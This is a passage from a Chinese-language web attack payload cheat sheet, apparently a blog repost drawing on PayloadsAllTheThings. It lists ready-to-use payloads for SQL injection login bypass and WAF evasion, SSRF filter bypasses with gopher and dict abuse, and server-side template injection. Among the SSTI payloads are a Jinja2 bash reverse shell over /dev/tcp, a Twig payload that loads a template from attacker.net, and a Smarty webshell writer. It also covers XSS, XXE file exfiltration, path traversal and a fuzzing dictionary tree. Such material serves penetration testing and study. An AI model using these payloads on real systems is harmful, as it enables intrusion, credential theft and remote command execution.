admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

认证绕过(Raw MD5)

1
2
3
4
Example:
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
我们只有找到md5($password,true)中包含' or '[...]的字符即可
md5("ffifdyop", true) = 'or'6�]��!r,��b�

waf绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
绕过空格
?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
?id=1%0Band%0B1=1%0B--
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--
注释
?id=1/*comment*/and/**/1=1/**/--
括号
?id=(1)and(1)=(1)--
绕过逗号
LIMIT 0,1 -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
等效符
AND -> &&
OR -> ||
= -> LIKE,REGEXP, not < and not >
> X -> not between 0 and X
WHERE -> HAVING
绕过information_schema.tables
select * from mysql.innodb_table_stats;
// select @@innodb_version;

15、SSRF

Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
可以利用SSRF攻击内网redis、discuz、fastcgi、uwsgi、memcache、struts2、内网系统、docker、Kubernetes、Hadoop、mysql等等
1、基本利用
http://localhost:80
http://0.0.0.0:22
2、利用重定向
设置一个子域名的DNS A记录为需要探测的内网IP,eg:127.0.0.1
http://wwww.example.com/index.php?url=http://ssrf.w2n1ck.com
3、利用文件上传
修改"type=file""type=url"
然后加入内网地址即可
4、XSS
http://brutelogic.com.br/poc.svg -> simple alert
http://wwww.example.com/index.php?url=http://brutelogic.com.br/poc.svg

Bypass

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
1、使用HTTPS
https://localhost/
2、使用[::]
http://[::]:80/
http://0000::1:80/
3、使用重定向
localtest.me
127.0.0.1.xip.io
www.owasp.org.127.0.0.1.xip.io
customer1.app.localhost.my.company.127.0.0.1.nip.io
4、使用CIDR(不知道是不是要配置什么,没利用成功)
127.x.x.x
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0
http://mail.ebc.apple.com => 127.0.0.6 => localhost
5、使用异常urls
localhost:+11211aaa
localhost:00011211aaaa
参考:https://low-level.readthedocs.io/en/latest/documents/SSRFbible.Cheatsheet.pdf
6、使用进制
可以是十六进制,八进制等。
115.239.210.26 >>> 16373751032
首先把这四段数字给分别转成16进制,结果:73 ef d2 1a
然后把 73efd21a 这十六进制一起转换成8进制
记得访问的时候加0表示使用八进制(可以是一个0也可以是多个0 跟XSS中多加几个0来绕过过滤一样),十六进制加0x
http://127.0.0.1 >>> http://0177.0.0.1/
http://127.0.0.1 >>> http://2130706433/
http://192.168.0.1 >>> http://3232235521/
http://192.168.1.1 >>> http://3232235777/
7、使用特殊地址
http://0/
8、使用@
http://wwww.example.com@www.baidu.com
http://wwww.example.com\x40www.baidu.com
http://wwww.example.com%40www.baidu.com
技巧组合:
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
urllib2 + httplib: 1.1.1.1
requests + browsers: 2.2.2.2
urllib: 3.3.3.3
9、使用enclosed alphanumerics
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
10、利用解析器
http://127.1.1.1:80\@127.2.2.2:80/
http://127.1.1.1:80\@@127.2.2.2:80/
http://127.1.1.1:80:\@@127.2.2.2:80/
http://127.1.1.1:80#\@127.2.2.2:80/
参考:https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf
11、利用协议
File协议
file:///etc/passwd
file://\/\/etc/passwd
Dict协议
dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
ssrf.php?url=dict://attacker:11111/
SFTP协议
ssrf.php?url=sftp://example.com:11111/
TFTP协议
ssrf.php?url=tftp://example.com:12346/TESTUDPPACKET
LDAP协议
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
Gopher协议
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a

工具

1
2
3
SSRFmap - https://github.com/swisskyrepo/SSRFmap
Gopherus - https://github.com/tarunkant/Gopherus
http://blog.w2n1ck.com/ip.py

16、SSTI

Ruby

1
2
3
<%= 7 * 7 %> => 49
<%= File.open('/etc/passwd').read %> => cat /etc/passwd
<%= Dir.entries('/') %> => ls /

Java

1
2
3
4
5
6
7
8
9
10
11
12
13
${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
获取系统环境变量:
${T(java.lang.System).getenv()}
获取/etc/passwd:
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}

Twig

1
2
3
4
5
{{7*7}} == {{7*'7'}} == 49
命令执行:
{{self}}
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

Smarty

1
2
{php}echo `id`;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}

Jinja2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
{{4*4}}[[5*5]]
{{7*'7'}} => 7777777
获取使用的类
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}
获取配置变量
{% for key, value in config.iteritems() %}
<dt>{{ key|e }}</dt>
<dd>{{ value|e }}</dd>
{% endfor %}
读取文件
''.__class__.__mro__[2].__subclasses__()[40] 表示文件类
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
写文件
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/hello.txt', 'w').write('Hello here !') }}
反弹shell
1、配置
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }}
2、加载
{{ config.from_pyfile('/tmp/evilconfig.cfg') }}
3、连接
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }}

工具

1
2
3
4
Tplmap - https://github.com/epinna/tplmap
python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade

17、CSTI

AngularJS

1
2
$eval('1+1')
{{1+1}}

Vue JS

1
{{constructor.constructor('alert(1)')()}}

18、目录遍历

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
1、Basic
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\
2、Unicode编码
. = %u002e
/ = %u2215
\ = %u2216
3、url双编码
. = %252e
/ = %252f
\ = %255c
4、UTF-8 Unicode编码
. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c

19、文件上传

Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
这里只举一下可以利用的点,就不一一详细例举了。
1、黑名单绕过
2、双文件上传
3、数组
4、修改特殊字段
5、截断
6、解析漏洞
7、ffmpeg
8、flash
9、imagemagic
10、zip软连接
11、htaccess
12、iis
13、ssi
14、pdf
15、python
16、csp
17、xss
18、超大文件ddos
19、xxe
20、URL跳转

20、XPATH注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
SQL:
string(//user[name/text()='" +username+ "' and password/text()=’" +password+ "']/account/text())
Payloads:
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1
盲注:
1、获取长度
and string-length(account)=SIZE_INT
2、获取内容
substring(//user[userid=5]/username,2,1)=CHAR_HERE
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)

21、XSS

Basic

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
<svg/onload=alert('XSS')>
<svg onload=alert(1)//
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)
<body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video src=_ onloadstart="alert(1)">
<details/open/ontoggle="alert`1`">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
<body ontouchstart=alert(1)>
<body ontouchend=alert(1)>
<body ontouchmove=alert(1)>
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
javascript协议
javascript:prompt(1)
%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
java%0ascript:alert(1) - LF (\n)
java%09script:alert(1) - tab (\t)
java%0dscript:alert(1) - CR (\r)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\) - escape
javascript://%0Aalert(1)
javascript://anything%0D%0A%0D%0Awindow.alert(1)
data协议
data:text/html,<script>alert(0)</script>
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>

XML文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
// 使用CDATA防止payload被解析成xml
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
<info>
<name>
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
</name>
<description>
<value>Hello</value>
</description>
<url>
<value>http://www.baidu.com</value>
</url>
</info>
</body>
</html>

SVG文件

1
2
3
4
5
6
7
8
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>

SWF

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
flashmediaelement.swf?jsinitfunctio%gn=alert`1`
flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000
swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);//
swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf
plupload.flash.swf?%#target%g=alert&uid%g=XSS&
moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true
video-js.swf?readyFunction=alert(1)
player.swf?playerready=alert(document.cookie)
player.swf?tracecall=alert(document.cookie)
banner.swf?clickTAG=javascript:alert(1);//
io.swf?yid=\"));}catch(e){alert(1);}//
video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29
bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}//

CSS

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<!DOCTYPE html>
<html>
<head>
<style>
div {
background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>");
background-color: #cccccc;
}
</style>
</head>
<body>
<div>lol</div>
</body>
</html>

22、XXE

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
Base64
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
PHP协议
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php" >
]>
<foo>&xxe;</foo>
DOS
<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>
盲注
发送payload:
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
远程主机上文件:
http://127.0.0.1/dtd.xml
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
XXE in File
DOCX/XLSX/PPTX
ODT/ODG/ODP/ODS
SVG
XML
PDF (experimental)
JPG (experimental)
GIF (experimental)
利用工具: https://github.com/BuffaloWill/oxml_xxe
在线生成工具: https://buer.haus/xxegen/

有兴趣的可以根据相关思路做个漏洞fuzz的字典,很有用的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
w2n1ck@w2n1ck  ~/Desktop/vul_fuzz  tree -FC
.
├── api.txt
├── command_exec.txt
├── crlf.txt
├── dicc.txt
├── directory_traversal.txt
├── ldap_attributes.txt
├── lfi.txt
├── nosql.txt
├── open_redirect.txt
├── php.txt
├── sqli/
│   ├── sqli.txt
│   ├── sqli_error.txt
│   ├── sqli_mssql.txt
│   ├── sqli_mssql_insert.txt
│   ├── sqli_mssql_where.txt
│   ├── sqli_mysql.txt
│   ├── sqli_mysql_insert.txt
│   ├── sqli_mysql_order_by.txt
│   ├── sqli_mysql_where.txt
│   ├── sqli_oracle.txt
│   ├── sqli_postgres.txt
│   ├── sqli_time.txt
│   └── sqli_union.txt
├── ssi.txt
├── upload/
│   ├── ffmpeg/
│   │   ├── gen_avi_bypass.py
│   │   ├── gen_xbin_avi.py
│   │   ├── read_passwd.avi
│   │   ├── read_passwd_bypass.mp4
│   │   ├── read_shadow.avi
│   │   └── read_shadow_bypass.mp4
│   ├── flash/
│   │   ├── xss.swf
│   │   └── xssproject.swf
│   ├── htaccess/
│   │   └── 1.jpg
│   ├── iis/
│   │   ├── index.stm
│   │   └── web.config
│   ├── imagemagic/
│   │   ├── centos_id.jpg
│   │   ├── payload_imageover_file_exfiltration_pangu_wrapper.jpg
│   │   ├── payload_imageover_file_exfiltration_text_wrapper.jpg
│   │   ├── payload_imageover_reverse_shell_devtcp.jpg
│   │   ├── payload_imageover_reverse_shell_netcat_fifo.png
│   │   ├── payload_imageover_wget.gif
│   │   ├── payload_url_bind_shell_nc.mvg
│   │   ├── payload_url_curl.png
│   │   ├── payload_url_portscan.jpg
│   │   ├── payload_url_remote_connection.mvg
│   │   ├── payload_url_reverse_shell_bash.mvg
│   │   ├── payload_url_touch.jpg
│   │   ├── payload_xml_reverse_shell_nctraditional.xml
│   │   ├── payload_xml_reverse_shell_netcat_encoded.xml
│   │   ├── ubuntu_id.jpg
│   │   └── ubuntu_shell.jpg
│   ├── pdf/
│   │   ├── poc.js
│   │   ├── poc.py
│   │   └── result.pdf
│   ├── php_ext/
│   │   ├── phpinfo.jpg.php
│   │   ├── phpinfo.php3
│   │   ├── phpinfo.php4
│   │   ├── phpinfo.php5
│   │   ├── phpinfo.php7
│   │   ├── phpinfo.phpt
│   │   ├── phpinfo.pht
│   │   └── phpinfo.phtml
│   ├── picture/
│   │   ├── Build_image_to_LFI.py
│   │   ├── php_exif_data.png
│   │   ├── phpinfo-metadata.gif
│   │   ├── phpinfo-metadata.jpg
│   │   ├── shell_cinema.gif
│   │   ├── shell_fr.gif
│   │   └── shell_problem.gif
│   ├── python/
│   │   ├── python-admin-__init__.py.zip
│   │   ├── python-conf-__init__.py.zip
│   │   ├── python-config-__init__.py.zip
│   │   ├── python-controllers-__init__.py.zip
│   │   ├── python-generate-init.py
│   │   ├── python-login-__init__.py.zip
│   │   ├── python-models-__init__.py.zip
│   │   ├── python-modules-__init__.py.zip
│   │   ├── python-scripts-__init__.py.zip
│   │   ├── python-settings-__init__.py.zip
│   │   ├── python-tests-__init__.py.zip
│   │   ├── python-urls-__init__.py.zip
│   │   ├── python-utils-__init__.py.zip
│   │   └── python-view-__init__.py.zip
│   ├── ssi/
│   │   ├── exec.shtml
│   │   └── include.shtml
│   └── zip_link/
│   ├── etc_passwd.zip
│   ├── generate.sh
│   └── passwd
├── web_cache_deception_attack_headers.txt
├── xpath_injection.txt
├── xss/
│   ├── "><img\ src=x\ onerror=alert(document.cookie);.jpg
│   ├── "><svg\ onload=alert(1)>
│   ├── xss_comment_exif_metadata_double_quote.png
│   ├── xss_flashfile.swf
│   ├── xss_intruders.txt
│   ├── xss_payloads.txt
│   ├── xss_svg.svg
│   ├── xss_svg1.svg
│   ├── xss_svg2.svg
│   ├── xss_svg3.svg
│   ├── xss_swf.swf
│   ├── xss_swf_fuzz.txt
│   ├── xss_xml.xml
│   └── xss_xml_cheatsheet.html
└── xxe/
├── xml-attacks.txt
├── xxe_etc_passwd.xml
├── xxe_fuzzing.txt
└── xxe_php_wrapper.xml

原仓库地址:https://github.com/swisskyrepo/PayloadsAllTheThings

大爷,赏个铜板呗!